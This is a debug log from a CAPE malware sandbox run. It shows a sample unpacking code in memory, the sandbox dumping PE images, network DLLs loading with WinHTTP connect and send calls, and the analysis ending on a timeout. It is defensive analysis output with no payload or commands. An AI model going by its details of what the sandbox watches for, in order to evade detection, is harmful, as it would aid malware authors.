2020-03-24 09:48:02,665 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:02,681 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF5580000.
2020-03-24 09:48:02,681 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000068BD0.
2020-03-24 09:48:02,713 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_249384878248924232020
2020-03-24 09:48:02,713 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xd3400.
2020-03-24 09:48:02,713 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf5580200-0xf5581250.
2020-03-24 09:48:02,713 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF5580000.
2020-03-24 09:48:02,713 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf5580000 - 0xf5581250.
2020-03-24 09:48:02,713 [root] DEBUG: ProtectionHandler: Address 0x000007FEF5581248 already in tracked region at 0x000007FEF5580000, size 0x1250
2020-03-24 09:48:02,729 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF5581248 (alloc base 0x000007FEF5580000), NumberOfBytesToProtect: 0x8, NewAccessProtection: 0x20
2020-03-24 09:48:02,729 [root] DEBUG: ProtectionHandler: Updated region protection at 0x000007FEF5581248 to 0x20.
2020-03-24 09:48:02,729 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF5580000), scanning for PE images.
2020-03-24 09:48:02,729 [root] DEBUG: DumpPEsInRange: Scanning range 0xf5580000 - 0xf5581250.
2020-03-24 09:48:02,729 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf5580000
2020-03-24 09:48:02,729 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:02,729 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF5580000.
2020-03-24 09:48:02,743 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000068BD0.
2020-03-24 09:48:02,759 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_1445765176248924232020
2020-03-24 09:48:02,759 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xd3400.
2020-03-24 09:48:02,776 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf5580200-0xf5581250.
2020-03-24 09:48:02,776 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF5580000.
2020-03-24 09:48:02,776 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf5580000 - 0xf5581250.
2020-03-24 09:48:02,776 [root] DEBUG: ProtectionHandler: Address 0x000007FEF55F07BC already in tracked region at 0x000007FEF5580000, size 0x1250
2020-03-24 09:48:02,776 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF55F07BC (alloc base 0x000007FEF5580000), NumberOfBytesToProtect: 0xe, NewAccessProtection: 0x40
2020-03-24 09:48:02,776 [root] DEBUG: ProtectionHandler: Increased region size at 0x000007FEF55F07BC to 0x707ca.
2020-03-24 09:48:02,776 [root] DEBUG: ProtectionHandler: Updated region protection at 0x000007FEF55F07BC to 0x40.
2020-03-24 09:48:02,776 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF5580000), scanning for PE images.
2020-03-24 09:48:02,790 [root] DEBUG: DumpPEsInRange: Scanning range 0xf5580000 - 0xf55f07ca.
2020-03-24 09:48:02,790 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf5580000
2020-03-24 09:48:02,790 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:02,790 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF5580000.
2020-03-24 09:48:02,790 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000068BD0.
2020-03-24 09:48:02,822 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_721892416248924232020
2020-03-24 09:48:02,822 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xd3400.
2020-03-24 09:48:02,822 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf5580200-0xf55f07ca.
2020-03-24 09:48:02,822 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF5580000.
2020-03-24 09:48:02,822 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf5580000 - 0xf55f07ca.
2020-03-24 09:48:02,822 [root] DEBUG: ProtectionHandler: Address 0x000007FEF55F07BC already in tracked region at 0x000007FEF5580000, size 0x707ca
2020-03-24 09:48:02,838 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF55F07BC (alloc base 0x000007FEF5580000), NumberOfBytesToProtect: 0xe, NewAccessProtection: 0x20
2020-03-24 09:48:02,838 [root] DEBUG: ProtectionHandler: Updated region protection at 0x000007FEF55F07BC to 0x20.
2020-03-24 09:48:02,838 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF5580000), scanning for PE images.
2020-03-24 09:48:02,838 [root] DEBUG: DumpPEsInRange: Scanning range 0xf5580000 - 0xf55f07ca.
2020-03-24 09:48:02,838 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf5580000
2020-03-24 09:48:02,838 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:02,838 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF5580000.
2020-03-24 09:48:02,854 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000068BD0.
2020-03-24 09:48:02,868 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_295956716248924232020
2020-03-24 09:48:02,868 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xd3400.
2020-03-24 09:48:02,884 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf5580200-0xf55f07ca.
2020-03-24 09:48:02,884 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF5580000.
2020-03-24 09:48:02,884 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf5580000 - 0xf55f07ca.
2020-03-24 09:48:02,884 [root] DEBUG: ProtectionHandler: Address 0x000007FEF5581228 already in tracked region at 0x000007FEF5580000, size 0x707ca
2020-03-24 09:48:02,884 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF5581228 (alloc base 0x000007FEF5580000), NumberOfBytesToProtect: 0x8, NewAccessProtection: 0x40
2020-03-24 09:48:02,884 [root] DEBUG: ProtectionHandler: Updated region protection at 0x000007FEF5581228 to 0x40.
2020-03-24 09:48:02,884 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF5580000), scanning for PE images.
2020-03-24 09:48:02,884 [root] DEBUG: DumpPEsInRange: Scanning range 0xf5580000 - 0xf55f07ca.
2020-03-24 09:48:02,900 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf5580000
2020-03-24 09:48:02,900 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:02,900 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF5580000.
2020-03-24 09:48:02,900 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000068BD0.
2020-03-24 09:48:02,931 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_819596188248924232020
2020-03-24 09:48:02,931 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xd3400.
2020-03-24 09:48:02,931 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf5580200-0xf55f07ca.
2020-03-24 09:48:02,931 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF5580000.
2020-03-24 09:48:02,947 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf5580000 - 0xf55f07ca.
2020-03-24 09:48:02,947 [root] DEBUG: ProtectionHandler: Address 0x000007FEF5581228 already in tracked region at 0x000007FEF5580000, size 0x707ca
2020-03-24 09:48:02,947 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF5581228 (alloc base 0x000007FEF5580000), NumberOfBytesToProtect: 0x8, NewAccessProtection: 0x20
2020-03-24 09:48:02,947 [root] DEBUG: ProtectionHandler: Updated region protection at 0x000007FEF5581228 to 0x20.
2020-03-24 09:48:02,947 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF5580000), scanning for PE images.
2020-03-24 09:48:02,947 [root] DEBUG: DumpPEsInRange: Scanning range 0xf5580000 - 0xf55f07ca.
2020-03-24 09:48:02,963 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf5580000
2020-03-24 09:48:02,963 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:02,963 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF5580000.
2020-03-24 09:48:02,963 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000068BD0.
2020-03-24 09:48:02,993 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_1827415644248924232020
2020-03-24 09:48:02,993 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xd3400.
2020-03-24 09:48:02,993 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf5580200-0xf55f07ca.
2020-03-24 09:48:02,993 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF5580000.
2020-03-24 09:48:03,009 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf5580000 - 0xf55f07ca.
2020-03-24 09:48:03,009 [root] DEBUG: ProtectionHandler: Address 0x000007FEF55F082C already in tracked region at 0x000007FEF5580000, size 0x707ca
2020-03-24 09:48:03,009 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF55F082C (alloc base 0x000007FEF5580000), NumberOfBytesToProtect: 0xe, NewAccessProtection: 0x40
2020-03-24 09:48:03,009 [root] DEBUG: ProtectionHandler: Increased region size at 0x000007FEF55F082C to 0x7083a.
2020-03-24 09:48:03,009 [root] DEBUG: ProtectionHandler: Updated region protection at 0x000007FEF55F082C to 0x40.
2020-03-24 09:48:03,009 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF5580000), scanning for PE images.
2020-03-24 09:48:03,025 [root] DEBUG: DumpPEsInRange: Scanning range 0xf5580000 - 0xf55f083a.
2020-03-24 09:48:03,025 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf5580000
2020-03-24 09:48:03,025 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:03,025 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF5580000.
2020-03-24 09:48:03,025 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000068BD0.
2020-03-24 09:48:03,072 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_556916591348924232020
2020-03-24 09:48:03,072 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xd3400.
2020-03-24 09:48:03,088 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf5580200-0xf55f083a.
2020-03-24 09:48:03,088 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF5580000.
2020-03-24 09:48:03,088 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf5580000 - 0xf55f083a.
2020-03-24 09:48:03,088 [root] DEBUG: ProtectionHandler: Address 0x000007FEF55F082C already in tracked region at 0x000007FEF5580000, size 0x7083a
2020-03-24 09:48:03,088 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF55F082C (alloc base 0x000007FEF5580000), NumberOfBytesToProtect: 0xe, NewAccessProtection: 0x20
2020-03-24 09:48:03,088 [root] DEBUG: ProtectionHandler: Updated region protection at 0x000007FEF55F082C to 0x20.
2020-03-24 09:48:03,088 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF5580000), scanning for PE images.
2020-03-24 09:48:03,102 [root] DEBUG: DumpPEsInRange: Scanning range 0xf5580000 - 0xf55f083a.
2020-03-24 09:48:03,102 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf5580000
2020-03-24 09:48:03,102 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:03,102 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF5580000.
2020-03-24 09:48:03,102 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000068BD0.
2020-03-24 09:48:03,134 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_1433815051348924232020
2020-03-24 09:48:03,134 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xd3400.
2020-03-24 09:48:03,134 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf5580200-0xf55f083a.
2020-03-24 09:48:03,134 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF5580000.
2020-03-24 09:48:03,150 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf5580000 - 0xf55f083a.
2020-03-24 09:48:03,150 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000000000000.
2020-03-24 09:48:03,150 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000FF900000.
2020-03-24 09:48:03,150 [root] DEBUG: ProcessImageBase: EP 0x000000000002B790 image base 0x00000000FF900000 size 0x0 entropy 5.860278e+00.
2020-03-24 09:48:03,165 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000006C40000.
2020-03-24 09:48:03,165 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF6DA0000.
2020-03-24 09:48:03,165 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF6120000.
2020-03-24 09:48:03,165 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF57F0000.
2020-03-24 09:48:03,165 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF5580000.
2020-03-24 09:48:03,165 [root] DEBUG: ProtectionHandler: Adding region at 0x000007FEF42BA5B8 to tracked regions.
2020-03-24 09:48:03,180 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x000007FEF42BA5B8) returned 0x0000000000000000.
2020-03-24 09:48:03,180 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x0000000000000000.
2020-03-24 09:48:03,180 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x000007FEF42BA5B8) -> AllocationBase 0x000007FEF4220000 RegionSize 0x4096.
2020-03-24 09:48:03,227 [root] DEBUG: AddTrackedRegion: EntryPoint 0x197c, Entropy 6.293267e+00
2020-03-24 09:48:03,227 [root] DEBUG: AddTrackedRegion: New region at 0x000007FEF4220000 size 0x1000 added to tracked regions.
2020-03-24 09:48:03,227 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF42BA5B8 (alloc base 0x000007FEF4220000), NumberOfBytesToProtect: 0x8, NewAccessProtection: 0x40
2020-03-24 09:48:03,227 [root] DEBUG: ProtectionHandler: Increased region size at 0x000007FEF42BA5B8 to 0x9a5c0.
2020-03-24 09:48:03,227 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF4220000), scanning for PE images.
2020-03-24 09:48:03,227 [root] DEBUG: DumpPEsInRange: Scanning range 0xf4220000 - 0xf42ba5c0.
2020-03-24 09:48:03,243 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf4220000
2020-03-24 09:48:03,243 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:03,243 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF4220000.
2020-03-24 09:48:03,243 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000197C.
2020-03-24 09:48:03,259 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_1688183748348924232020
2020-03-24 09:48:03,275 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x137800.
2020-03-24 09:48:03,275 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf4220200-0xf42ba5c0.
2020-03-24 09:48:03,275 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF4220000.
2020-03-24 09:48:03,275 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf4220000 - 0xf42ba5c0.
2020-03-24 09:48:03,275 [root] DEBUG: ProtectionHandler: Address 0x000007FEF42E0A9E already in tracked region at 0x000007FEF4220000, size 0x9a5c0
2020-03-24 09:48:03,289 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF42E0A9E (alloc base 0x000007FEF4220000), NumberOfBytesToProtect: 0xe, NewAccessProtection: 0x40
2020-03-24 09:48:03,289 [root] DEBUG: ProtectionHandler: Increased region size at 0x000007FEF42E0A9E to 0xc0aac.
2020-03-24 09:48:03,289 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF4220000), scanning for PE images.
2020-03-24 09:48:03,289 [root] DEBUG: DumpPEsInRange: Scanning range 0xf4220000 - 0xf42e0aac.
2020-03-24 09:48:03,289 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf4220000
2020-03-24 09:48:03,305 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:03,305 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF4220000.
2020-03-24 09:48:03,305 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000197C.
2020-03-24 09:48:03,336 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_2121545002348924232020
2020-03-24 09:48:03,336 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x137800.
2020-03-24 09:48:03,336 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf4220200-0xf42e0aac.
2020-03-24 09:48:03,352 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF4220000.
2020-03-24 09:48:03,352 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf4220000 - 0xf42e0aac.
2020-03-24 09:48:03,352 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2548.
2020-03-24 09:48:03,352 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:48:03,368 [root] DEBUG: DLL loaded at 0x000007FEF4950000: C:\Windows\system32\WINHTTP (0x71000 bytes).
2020-03-24 09:48:03,384 [root] DEBUG: DLL loaded at 0x000007FEF4500000: C:\Windows\system32\webio (0x64000 bytes).
2020-03-24 09:48:03,384 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4500000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:03,384 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4950000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:03,384 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:48:03,384 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2020-03-24 09:48:03,400 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFEE90000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:48:03,400 [root] DEBUG: set_caller_info: Adding region at 0x0000000006DC0000 to caller regions list (winhttp::WinHttpConnect).
2020-03-24 09:48:03,400 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC890000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:48:03,414 [root] DEBUG: DLL loaded at 0x000007FEFC290000: C:\Windows\System32\wshtcpip (0x7000 bytes).
2020-03-24 09:48:03,414 [root] DEBUG: DLL loaded at 0x000007FEFC880000: C:\Windows\System32\wship6 (0x7000 bytes).
2020-03-24 09:48:03,414 [root] DEBUG: set_caller_info: Adding region at 0x0000000003E10000 to caller regions list (winhttp::WinHttpOpenRequest).
2020-03-24 09:48:03,414 [root] DEBUG: set_caller_info: Adding region at 0x0000000007C70000 to caller regions list (winhttp::WinHttpSetOption).
2020-03-24 09:48:03,430 [root] DEBUG: set_caller_info: Adding region at 0x0000000007C70000 to caller regions list (winhttp::WinHttpSendRequest).
2020-03-24 09:48:03,430 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC710000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:48:03,430 [root] DEBUG: DLL loaded at 0x000007FEFA030000: C:\Windows\system32\rasadhlp (0x8000 bytes).
2020-03-24 09:48:03,446 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA030000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:03,446 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC710000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:48:03,446 [root] DEBUG: DLL unloaded from 0x000007FEFAF10000.
2020-03-24 09:48:03,477 [root] DEBUG: DLL loaded at 0x000007FEFAE20000: C:\Windows\System32\fwpuclnt (0x53000 bytes).
2020-03-24 09:48:03,477 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFAE20000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:06,005 [root] DEBUG: DLL loaded at 0x000007FEFC680000: C:\Windows\system32\schannel (0x57000 bytes).
2020-03-24 09:48:06,019 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC680000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:07,767 [root] DEBUG: DLL loaded at 0x000007FEFCA70000: C:\Windows\system32\ncrypt (0x4e000 bytes).
2020-03-24 09:48:07,877 [root] DEBUG: DLL loaded at 0x000007FEFCA40000: C:\Windows\system32\bcrypt (0x22000 bytes).
2020-03-24 09:48:08,032 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCA70000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:08,032 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCA40000 to caller regions list (ntdll::NtDeviceIoControlFile).
2020-03-24 09:48:08,125 [root] DEBUG: DLL loaded at 0x000007FEFC530000: C:\Windows\system32\bcryptprimitives (0x4c000 bytes).
2020-03-24 09:48:08,203 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC390000 to caller regions list (advapi32::RegOpenKeyExW).
2020-03-24 09:48:08,328 [root] DEBUG: DLL loaded at 0x000007FEF4FC0000: C:\Windows\system32\cryptnet (0x26000 bytes).
2020-03-24 09:48:08,328 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4FC0000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:08,345 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFBA20000 to caller regions list (ntdll::NtOpenSection).
2020-03-24 09:48:08,359 [root] DEBUG: DLL loaded at 0x000007FEF44E0000: C:\Windows\system32\Cabinet (0x1b000 bytes).
2020-03-24 09:48:08,375 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF44E0000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:08,391 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:48:08,437 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFAD90000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:08,437 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFAF10000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:08,453 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:48:08,453 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFE2F0000 to caller regions list (ntdll::NtCreateEvent).
2020-03-24 09:48:08,470 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:48:08,484 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:48:08,516 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:48:09,763 [root] DEBUG: DLL unloaded from 0x000007FEF4FC0000.
2020-03-24 09:48:09,779 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:48:09,904 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:48:09,936 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:48:09,951 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:48:09,967 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:48:10,309 [root] DEBUG: DLL unloaded from 0x000007FEF4FC0000.
2020-03-24 09:48:10,342 [root] DEBUG: DLL unloaded from 0x000007FEFE4A0000.
2020-03-24 09:48:11,121 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2216.
2020-03-24 09:48:11,121 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:48:11,137 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1996.
2020-03-24 09:48:11,153 [root] DEBUG: CreateThread: Initialising breakpoints for thread 1500.
2020-03-24 09:48:11,167 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000000000000.
2020-03-24 09:48:11,167 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000FF900000.
2020-03-24 09:48:11,167 [root] DEBUG: ProcessImageBase: EP 0x000000000002B790 image base 0x00000000FF900000 size 0x0 entropy 5.860278e+00.
2020-03-24 09:48:11,167 [root] DEBUG: set_caller_info: Adding region at 0x0000000000060000 to caller regions list (user32::SetWindowLongPtrA).
2020-03-24 09:48:11,167 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000006C40000.
2020-03-24 09:48:11,184 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF6DA0000.
2020-03-24 09:48:11,184 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF6120000.
2020-03-24 09:48:11,184 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF57F0000.
2020-03-24 09:48:11,184 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF5580000.
2020-03-24 09:48:11,184 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF4220000.
2020-03-24 09:48:11,184 [root] DEBUG: ProtectionHandler: Adding region at 0x000007FEF37AA030 to tracked regions.
2020-03-24 09:48:11,200 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x000007FEF37AA030) returned 0x0000000000000000.
2020-03-24 09:48:11,200 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x0000000000000000.
2020-03-24 09:48:11,200 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x000007FEF37AA030) -> AllocationBase 0x000007FEF3690000 RegionSize 0x4096.
2020-03-24 09:48:11,246 [root] DEBUG: AddTrackedRegion: EntryPoint 0x1010, Entropy 6.087271e+00
2020-03-24 09:48:11,246 [root] DEBUG: AddTrackedRegion: New region at 0x000007FEF3690000 size 0x1000 added to tracked regions.
2020-03-24 09:48:11,246 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF37AA030 (alloc base 0x000007FEF3690000), NumberOfBytesToProtect: 0x8, NewAccessProtection: 0x40
2020-03-24 09:48:11,246 [root] DEBUG: ProtectionHandler: Increased region size at 0x000007FEF37AA030 to 0x11a038.
2020-03-24 09:48:11,246 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF3690000), scanning for PE images.
2020-03-24 09:48:11,246 [root] DEBUG: DumpPEsInRange: Scanning range 0xf3690000 - 0xf37aa038.
2020-03-24 09:48:11,262 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf3690000
2020-03-24 09:48:11,262 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:11,262 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF3690000.
2020-03-24 09:48:11,262 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000001010.
2020-03-24 09:48:11,278 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_6819044761148924232020
2020-03-24 09:48:11,292 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x141800.
2020-03-24 09:48:11,292 [root] DEBUG: TestPERequirements: Possible PE image rejected due to section 1 of 1673, RVA 0xcd8b4920 and size 0x568dc68b.
2020-03-24 09:48:11,292 [root] DEBUG: TestPERequirements: Possible PE image rejected due to section 1 of 17, RVA 0x30b19 and size 0xffef8.
2020-03-24 09:48:11,292 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf3690200-0xf37aa038.
2020-03-24 09:48:11,292 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF3690000.
2020-03-24 09:48:11,292 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf3690000 - 0xf37aa038.
2020-03-24 09:49:09,200 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF8390000 to caller regions list (ntdll::NtDuplicateObject).
2020-03-24 09:49:09,232 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF45C0000 to caller regions list (ntdll::NtDuplicateObject).
2020-03-24 09:49:11,134 [root] DEBUG: DLL unloaded from 0x000007FEF4950000.
2020-03-24 09:50:26,233 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2020-03-24 09:50:26,233 [root] INFO: Created shutdown mutex.
2020-03-24 09:50:27,246 [lib.api.process] INFO: Terminate event set for process 1632
2020-03-24 09:50:27,246 [root] DEBUG: DumpPEsInRange: Scanning range 0xff900000 - 0xff9b9568.
2020-03-24 09:50:27,246 [root] DEBUG: DumpPEsInRange: Scanning range 0xff900000 - 0xff9b9568.
2020-03-24 09:50:27,246 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000000000000.
2020-03-24 09:50:27,246 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xff900000
